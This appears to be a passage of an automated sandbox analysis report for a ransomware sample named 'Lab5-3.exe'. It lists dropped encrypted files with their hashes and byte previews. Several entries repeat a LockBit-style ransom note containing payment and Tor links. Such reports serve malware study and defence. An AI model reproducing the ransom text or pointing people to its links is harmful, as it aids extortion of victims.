                                                                                                          SSDEEP:48:k/nlJU0Mt1gCXHfUTid3hBaUoSGFcmeykEdEElU92i:kvnJMAC8Gx0uKeY2ElUJ
                                                                                                          MD5:9191ADE0796A4A09B255F38C8F950CC0
                                                                                                          SHA1:5F193F90F240E538F2C3D35BA659FB80FC764E17
                                                                                                          SHA-256:0A176184E5E0353862EF25E09F74C90272EBF57F6415FD49577A256B71D5F8C9
                                                                                                          SHA-512:4C35678C1829759E37CF764F5AFC1C6915F3C1DB99E675777803DC8A41D8355F7BB7A20F822A3305A5463D2098F51755AB24493DD7BB617C946B35DADF87C494
                                                                                                          Malicious:false
                                                                                                          Preview:..7t.......wH4.mL.X.~d=IS.g.....P.....P.k..5R...n..A.q"B/dd..`1...c1..14aGE.w.......P:&.d% ..V.u^....h+. L.N.H..F;.]X..>-VS.A;.r...u:.k|J.TW..4(Be<.,~ ..#r.G.....V...9.......(.D..[.E.IX..NL.k.m..4..x3.H...h;.:...!.o.../a..~f..m)....ss.7..i.A\...Tw2).....K.....7F....g.q.Y...V..T......X{..N.$h.fp/.._.U.X.......'.....z...\.X.$o..Q...S'Th.....=.(..kL).f..GB*O.....6.:.NfY.b.).JZ.G.....r...=...V.........$..P...K...;.%.T..q...cDg.b..K..).!.....;=.(=.ixNg...7...@..I....U .^T...T....~C.....q..~zP.j(..b.F.h,......$...~pSW.(.-....\z.T.0....._..#...78MP..".q~.\..!a..U......c...X..R..._g.x.'.....U'...Y.q.].....ma..d.2.gr@.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.912607814537823
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:w4MOILTJYv4QEZKCjwHfUTid3hBaUoSGFcmeykEdEElU92i:wmoQEZTLGx0uKeY2ElUJ
                                                                                                          MD5:C8CBAB8A994EBF912EEEF62352B25916
                                                                                                          SHA1:4AFCBA1AE35612065C170228CCB45B9605EB203F
                                                                                                          SHA-256:3677ACC89C7876A7A0345C401FFAEB63A25279E2CCAC709A0AF945A26F9866A0
                                                                                                          SHA-512:57AA20AC61B5F048631E5D792C52C0F32CD51412FD07A387052425473A6A528D965A3F7FDC7DA0781B54009581F250B757F2C06E94B7D8D97EFCB42002714E30
                                                                                                          Malicious:false
                                                                                                          Preview:..E.I4.Caw.. nbj.h..lYMBt._m.$.\<.Ei.V.v[5w...E..>{.H}....\.....g...P.}......_..,.i....92B.....v...YP(.R.....,...eI74Q.....[(YW4.....\\...r@..N..5Jq.Hl.|.G.....z.L..7>H.g....J.."C5k"....p(.Q.....i)m.K...6..0.....].p..u)HE.=........r..U..qh...z.K...C...}..U.t..7n..6..2&.v3` ..".d.,.S]"&.w...YL.O..l8E/....E...'.U..!p.<P.....0....F...9#..Z.r..$..F/J....-.y.A3}.d?/..s....k.e......_..$....^O.t...U............eB.2G.Q.s")i8./{..:..@.mo.D....O..(Y......r.o"K...d.$.7yc........?.......A..*c-..OZ.Kg.q:...$.?.'..O...v..k$?.y..+..&V.......N..@D..?..6T.:.F.. ..3...T.;..O..L!1....,.9....r....,.........Bw.......4{%.x.Q..bG............2..<.m.p#...-....../.:.f...v......r.0..^.;.........j61..,.}.{../S..^Q]D...5..%......@o....'..IN...(vB.9.......H)..............j2.@{\.p..+...r.Rn!...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.911194754589682
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:NvMXnUj1+2JFHfUTid3hBaUoSGFcmeykEdEElU92i:dMXnUp+jGx0uKeY2ElUJ
                                                                                                          MD5:041D82C4FAD72EF9DFB90B6DC5A046BC
                                                                                                          SHA1:697AC79BB01ECB31F4F474570B9C6E9A07A3DE56
                                                                                                          SHA-256:84687C54BADA89E68C8B0266AA71BACE43A049EC4CE687F8A03C781F85656DDB
                                                                                                          SHA-512:A8F71946CD0693DD7428D53AD5DCC73DA65B195F9B7D5680F421B2F5E31E4FF89B600686C1483350801FE394712EFFF36C527CD13BAA4924BDD0E57B554A73E3
                                                                                                          Malicious:false
                                                                                                          Preview:.nv3=d....c.....#p|.$...........t........e"Gd.X&9m..~...W+.^...>%.C5...A7U..e...m.F.q.W=W..."U..j.T./:..|t.....d..nEO.|.M/.p...p..-....V..+k..V......Z.S5..q'.m%..?..../#~Tj.R..Y.7....k..T.1.T..I..2.-f...h...o!4.+......H35..r.."...{...k.2H.-u.d.t~F.[i.Q.-#.......<py..#t.b..V].V.....6..."..v...I..MW....6%..P..vF.#y......1..Y:...S.....1..^.E.S...\.2.U_@.$..%....3....WM..5.Vn.....Z.M....E..:.:..n...@..?r.>[q.p...z.cFB.UP..|..v&..Q...2d..F\..W}W...u.{x.........N@.$.5WK<.A...|..Ld./.........dkR..H..&..C=...z...n.....efNM....#.. X.|D<.....c&..i....K..]=.-.=/lO.>'..h.A........M..NB....>'D..bv.mnKWL...+.n..w....%N.w...e*..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.913410153029595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:beg+/aGreUql3XlQh1CKTHfUTid3hBaUoSGFcmeykEdEElU92i:X+hKJA1DgGx0uKeY2ElUJ
                                                                                                          MD5:8D93CB7B5E228E0E656023FDF9636C02
                                                                                                          SHA1:54634A7FD94D283DD0FF0D7CB7F9D725AF8999AC
                                                                                                          SHA-256:4C38BFAF58EAF3054E23D71EAE8B18AC5B38B69FBEE705FCF6B38C3871146546
                                                                                                          SHA-512:4666D4548BD82766BCFE20843B3BD3677DC3EAD1C687E375654209E8C838D4062A6B608BA5DA45BD5347007AA67DD31B26E49A3F9C3E6AA8AA734A3F57B8C890
                                                                                                          Malicious:false
                                                                                                          Preview:Ab.K.9W..f.9.........3..C..m....}.b.=Et.=...j.D.`....;..N......;..}D..6.#...7.T....G.?A..h...v..v...b(..tw..@ ........q0.B.T...E..t.(.^........q....!p..J.5...A..Kg.1V..Yo.y#s..K..#...j.LH .....9...P*..Z.M.K.....}O..X~z...A.{6p".V..~.>q..G..#.6.....a....b>0A1.Z.C..V.........r...j..4..8..j<H.PSy.'}|.......m.:....j.3..4.... .i....=..3..a..Ci.P.u..`!.#....r.S..q......zN7.).u...Na.DX.O.&._.A<..&.,.@..b....%O.90.i......L.J.K....XY.........C.O...O......C.B...X..g....h.C.7.KUy|......".n...|.i.....J..xV...........R.=.ZY.......p.W3..o..".T.......B......5.O...Q..!%R.|..b'...........P(....|..t...\..2L.H.....\.Z. . ..Y#H.Jb&.W.G.....T..Hm.5.&...~...x[....g.'./...HZ+.eZe].*I.....X. ...X...c..4.x.k.....2+$z.w.. S.Y.A9>-2X..4Ur.t..G... .......sT9}D..+4....N...B.3.B..Z..K..@V.M...>....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3456
                                                                                                          Entropy (8bit):7.943018013450115
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ZPmnND5VXvoahoEW5SYG/ItOKfUnlYbLsoWF4RsNHfUTid3hBaUoSGFcmeykEdEb:hWND5dvoVEWPTf0lY8ohGx0uKeY2ElUJ
                                                                                                          MD5:D7D13F2C1D833B9A78BE48BBE3264BD0
                                                                                                          SHA1:D0F0F0DBFC44EFCA63483620A90F9E7448A11050
                                                                                                          SHA-256:D6F2623BA4DE6C960CDE4548C46E07A85833962E84C65DF1DFF0C5F66AA78C97
                                                                                                          SHA-512:EAE451BD49784A2B05BFC1211041DD66B9E2E23579C9F0C7297670719B4DCC6CEA3F34E2676CFEA49DF88AD0424E94A083B987ECF96C57AA1EF711BFBC5B8834
                                                                                                          Malicious:false
                                                                                                          Preview:.U:..*.G.H:.\.9+.4....V.b0...Y.r..I.?..V.:...;..hJ.oj.......~....LE....Z.G..=x.....L.T.%....'R.l8/....O9..-./u}.bW..t....4.`...xq.Y.......+..:..|\_.j..!uJ.yB`.....PK....ds.......Lw...>.U...X...q..?..78C............w..4.f.......B.8.&T....T^..\.......,.S.L}Rn..k.[xR...io....uH.......G...s..b.....R...U.Oj.V...._...v.oZF.......d..m.....)WLBw.~.{..Y..Y.u.IQ.*...F.<..@*}.6..A...'..j..3.).....)rx..<..T...W.%..@.$.x.(......%.u.F.(D..48.~Oj..;.@`..]..0..!J..N...."d,....$l.(.....A.......&...&k..+....\.........E9...>.....o9......t..W..>m..pC.T+.0...J...)..[..zvD...........{....U5a... ..{S\.P.=...Ubx.........u..h-.1.|....)..U...Xu......B.?:,.........Wu.s..S..[.U'.......'..W...F.:.AV.O.k.8Q..~,.u%.J....|......m.4S.y.+b.M 8.....o(...O.f..s&...\..._...}..Y.m.OX-{....n.`./.....I.....Z..x?.Hb8..;S.EZB...e.5.".#)$#.=^8.H.....2.;f..|\........k..]jPr..U.~..0...!R,.8).nx......3E%.BOo..~...G..-..^.`].(v.......|Q7...."...Y..bl.F`.V..Z.x.=....l<
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.931600267725158
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Z8R3qBm11KhsKSX6HfUTid3hBaUoSGFcmeykEdEElU92i:YqBKI4lGx0uKeY2ElUJ
                                                                                                          MD5:F8B5A07E70B91C645498B7EAE6B541F0
                                                                                                          SHA1:C1CD9D32086FD99471994842B683300D2776D7F5
                                                                                                          SHA-256:577A46883DE839B166BA82566BEC3974078A05A02F3B00E15367AE0B1259E189
                                                                                                          SHA-512:A91843502A3123E98034FD39F4781BD227265563913DDF7DAE3B55D52A6B1BCD56AE32E28E15A3A18F7CA050A2D75722749A8D0404D3ED6748E84A06B3EACB30
                                                                                                          Malicious:false
                                                                                                          Preview:...InN...U....).u!B8...|.>(......]vA..6|%M:G.....=O.7.~......j,Os.VE...A.DL).D......o...:.sco......._.P....}.:.#..%....k.7.b...... ......O2.n....C.....ef..x.I..v...4*..k.....D...Wj.Z..(....$h.g...09.:.)..`.j.|....u..:........9P.{&:.....n..zC.2(..V.J1E&C...'I.....G..W.}#...\....C.u=..l..u...I..5[1...0........dR.,P...g.El...0?..0b....^5^M...{.+*..u}......)%.g.m.W"...X.p.:z....E.2|..j....,..$.}..U.<..F..X.....6;.2...H.z.....$..j%.I....(O..*..!..Y..'...{~..7WSX....sn.O..2u.W$A..54..Pu{...........C@.|..Z.s..0^V.^p.4@..I...z.w:.zq..2`Ya.q!.......Zxp/..n..=..u,x!..FHd..?..pv... ..>0R...N.c...4...B.z........]..].s(#...p..'.Un..3.`..=qn"=5:.v..T...6.g:V...3..!..?'b#.......U.Q..N.>.......fBd.]$..{\..)....<.FK=.U..TT...s.3Y.M%'@...A.'.].&.. .7FM.....pA2.....H~......i9h..U.).W....dX..!;..3?...b.h...Q..6O....n.X..L.z....xYK..X..?...{..s_Cy.S%..W.V...K nL...x.J..?#......j..NX......S~..Q...Y..q.c+..N.r.7.....6_.y.....s.7*]_3q......&w../{..Q`Y.f.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2496
                                                                                                          Entropy (8bit):7.935961158538489
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KqtuAB/zFY1sWVXY+AWDQmDaqHfUTid3hBaUoSGFcmeykEdEElU92i:Kq0AB/z8sSfAfZFGx0uKeY2ElUJ
                                                                                                          MD5:FAAEF9919E4428B5B189DE6A9BEDBF43
                                                                                                          SHA1:30E69F621C3D6D5AD8FC571A2D574D6F985071F0
                                                                                                          SHA-256:9B6E6AE98A4C9E70E25EF99AE571A54E93E13C362D19B0A333FB8B156FC4EF06
                                                                                                          SHA-512:62BA40AA1D9249E8D38CBB7A05B7660CBE72C5A3C51C0FD2DFB0EFE04D9636E77B41A80D483EDA0BBC9738BAF10860761048FEE67954CC56812740AF4AE8C24F
                                                                                                          Malicious:false
                                                                                                          Preview:....]u..6K....bv0.k....0....bb.j..LD......"$...9........(.[g..v..!.....<.V.y....g.\..b-t...ulO=..[..S.=f.v....]z.....+...._l.GOOp.8...V.U.5..,NY,..N....u=.cD~m..C..s3.xg....Q.R..\9.0..fR;...4....8.=?.....9.Xe.@..N.......**..!........q.R...u./..*...._.......![.E.... .AYl'.b..M).*S.}H.....iC.....i...K..fuN....^]w&..\qX..6..........4Y.....k.lxw.l....p.........A...B......~..jr..|...q.#{sk..B..D..G... ..j..H?..f.+~..F..z9.......z.|.`......%.+TnP\..>J[..[.....*.L=/.@......^...w..........:..:.5..%.Y.68..:..V-.%..w......ur..B....@...U=.s1...0.x...)Jt..$.Jb.9.J..b..7...<A.Zm..b*..7.>.)#$@...dFA.... ......(=X~wX.8i,...`.a.}..f..nC..E..ES...tm...%.,fab.... p.R......=.....D..]Je?.../..K.._.!m.5.e.....a.=E.i......s....%j...:.....$.X.Q..3.....U..c...f...V....m..)F......)..G_..NWm...c<..W.......v....J....n..4....U..........%Pk...`B.....8fq!...;..6*k.3b.Rsx...KX...U.a..FM.og23PQ.......?...(..(.yT.z...(...|.WBX...@E.hFx.l./.7.CN2T.k..."9.?Z..d...w
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6064
                                                                                                          Entropy (8bit):7.971045651183895
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:1AElDGwFflvqdSVJmbVEVzFUW5LsueXT+uGqAyT+jS9Gx0uKeY2ElUJ:1Hl7vxXQEVR/LszT+uGqijSG0Cb
                                                                                                          MD5:DA71841ECB1342EF92B0D5DDA2D7771F
                                                                                                          SHA1:C981DAF395932EA3DD45948C3503CC8D51FE11E8
                                                                                                          SHA-256:A00FE0984D4DD95133CC9B38F104C4CD4CD2016B99F5B0F9266CB5256F2E3196
                                                                                                          SHA-512:8649B0D1633BAA6D93C549258542F424BAC5DBD7090198FD31275A79F681CBAE8EF620048BE62777F8861ECDB44E5C6BF1AA519459E6267D9CBD518843D1A3EF
                                                                                                          Malicious:false
                                                                                                          Preview:O.%......0...-.S.z..Wj!....M.......o.....@...9.a.q...9.K..........(...@J..?..Ob]}.5....v....}.V.#)..B2Rx.=..5*.a.[V.q.[.H..+.?^../.L.....TTMs..!.x.......`C>..U...1.....b...@....9.[..Rj.........7.Yd.....+>..T..R:..N.....e.../..i..#.g.l.R........\xz...OJh_C..C+|..2f......TGo..X-.:..:.....x......&'O..~...SM.].H3E.0C.P....hb..k.{.^...H....Ns..\..(.$...K...D...K...q$z..0......;j.&G.........)m`.......Na...x.Bp6&?..LlI &-.|=..uZ....4...{.c.jT...a...{3^....P..2..6-.v......e|[<?..V.r.-i....G.e&. ..ll>....Z..t.4.C......*T..S../..i.j..a......m...B.;....N......@.....M(..d..m%Ke..zC....*8.t)._..P...V.}..U.......PV..1.9\t......P8.<.c@....\}7f...B.'.S....y.._,MaI....g..F.\?..T>..l..H#y#,.......7...L/]../.Ln9X.`.......:cG..xD=.&.*.?C.Yz...NO...f......Bfm!...Z....gh;Z.f.v......QV..(gQ.e.1.U..R05.....H..H...f...vb.ql..P...K1...I6.~:* .............~.. .gP.....\..9i..KW..=|..@-...Z...U.l...(8.....r.|7..Y...e.U.N........l.X.F>.R...o.|.4.A.L....hK.`..dF.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14480
                                                                                                          Entropy (8bit):7.987926528122582
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:iag1gkbY6Az15OcTLAVTQtYnkiPaI86DDz+n5S1wAt/iiJnu5FUOWQOJ/8XTk0Cb:zgFk6AB5OxA5Yzy5SxtHJ3OQ/OTktb
                                                                                                          MD5:B5DF3F7D58B53D204E283F55C2971B22
                                                                                                          SHA1:8ADBA3575B313462CCA3B150A134D7CE8A578A8B
                                                                                                          SHA-256:3577A13EACC4E6EAE4722B625E889029B796617AD634FE610A0E2543670F59AD
                                                                                                          SHA-512:828605B6055099FBCC8992AAA61B811C6E1877E72C8BE340CFDD102BA123BF41116C71D4D4296D1835EC712D1A4CB37EF32C58924DD877D92ED164E21F095777
                                                                                                          Malicious:false
                                                                                                          Preview:k.R}l.|..].9N.T..V..mz.5...@'.C..%.......+.r..../.|........o.=...7S#..Y!.=..M.v.,..)..T0M..*.~kU..>K.7..B>I..y..'.8.3.)..37.mI.Y."bC...}...U..^>.v..i[...q..b..~2....Z.!A...$../ni......[P. ....)q.v.8...o..Ba...+..u.cR...=......`.B...N...h.$.'...G....q.'.P....@|..2..nu...ln1..u..p.>.(Z..Yz..}~..!j..gUk.m.QH.M\u.B..RRJz.Af..-.......v.>Dn...9.....Aj..@.T.&s.O..e.$..a...K..u....O..._..&.. ._".n.Xni,....l.r...7.....>...j_v.T<.......V.*+.JT.G......'.Z..`.....;..(.h"..Y.J.......I....1.u7S...SwN^.Eu..%..H...Z...x3..|-.h.$..Uh$[v:...Sd...$...7.G.D;i..{.....T.q..'p.....2..-MD.E.0.WB...+R............|.......W....#c..\S....L#.J......W..r..s...V.c...wk...0.B.Rz...7...s.-...O...Uo0...N...B..}.........H.?...%."...Pq..[...r....u.6..H....v.@wUs.X[.....*L.w.._J.....".....W..j..J....S......#.....L-..".f.<.6"*.......O.l.C..t...8Rq.....&...o..u..."0R..B.5...7...+16...S....Z..?.y..Z....QML.`.T..{....._..a).4P..A~'..-.1.`.D.].v.(.d..P.S...Nh._.F.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30832
                                                                                                          Entropy (8bit):7.994228820698029
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ZanyWy4BWXUjAv/8HtLnB3NaqtuwwuUWZ:UnyWyqKUjJHtB3Natwj1Z
                                                                                                          MD5:2A56D0982045EEF5967239D39A26556A
                                                                                                          SHA1:6B8AA4380ADF0113FF616FA842303C661F837FCF
                                                                                                          SHA-256:2031D7E6382605926EBC24DC87E1C1F22F63027F28694F53FB11CA7AF33C9291
                                                                                                          SHA-512:C58F50231D26E15FA453E7BA1DD71C4099AC4CD508AF0D193C77D7D463F710E8B3BEFF25F4394FAB1515530EB940F6134F084C9658FDE580E96B535FF522BAB1
                                                                                                          Malicious:true
                                                                                                          Preview:..[W.......1.>2.L..........i..w.aR...B.....`......8.z2...[....:a....%r.....g..z)"KWb...9.......WO~.*.x.`....h./@.0...4..Xs.. ....q.f.~.L...L.y...kC..._.3..t2..&...9.x....,./_0...W.W...A.h.I.. .\..bUO..a<b...!..5;..Z..FtO...>.j..w..* .^|.a.j.;.<hIP..;...4.Y....I!/..g.E...?..&-d.^1r."....H&O...x.fK....Z....0...9..a...{..A(.(.!.2.1=.APA..r....x.B.m.8......i.M.......Z.E.........I..&...6&.E..\%....(-...#"r..l..=...%...q&.g.z5..9.:.gN..d.0..*..g..a..I...c..{....gR,~f. .......{...mR.JB..X...7...G.T._......[..$#....t.p.-.C..CA.J&2.....a...0.m...6>!..P.........v.I+....w..C.k.Z1..R....Fj..<(....[....o.nr.7......,.c#.T.Hz.5...N.!..8}.....;...-.....]q.x.x)....3...S....)N..%.%..7.|t.3..........n..^F.fRC.,..c.Nl.+#Q.).7....}..P...(AK."._./...Y.;.n#....b!...')(..y.H.B..T.......u...0W.,M...4..F...0Qu.d.\......`...g...... tB.X.. f....P.?..E.d>A*...*..Mh*j....,..T#.....a..S.7..V2..BW8.jJ..h.}U.~.Gj..'.j...Ys-..`n..^S..>...rk"8.'Yt".H..6..S%..m.?.D....<.}..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5056
                                                                                                          Entropy (8bit):7.965603927965122
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:mI8ztW/tkDCrycJEq/hutlHzMgeBifUTRIY2wKnmQ2GmUuXGx0uKeY2ElUJ:mI0tWFkDC2WoDMgegoEFnfaUuE0Cb
                                                                                                          MD5:A588F7168E2A9AA6D6FAD73D63917E0C
                                                                                                          SHA1:4A54894EE9BC9C0B11969190D950560983DBD8D3
                                                                                                          SHA-256:2EEC08AC97A3413C4FDEBB3D8E309C581A4E3E0E54BE8E20E79ADAA1B8A48C99
                                                                                                          SHA-512:017563DCFD330D18C85FBDEED746A858D28133A80AD3C857D5EC06841B1236CFD7F4F021E86E604F466F98BF2579CE22E7552C20C0525B9E8BFD18D762ADE849
                                                                                                          Malicious:false
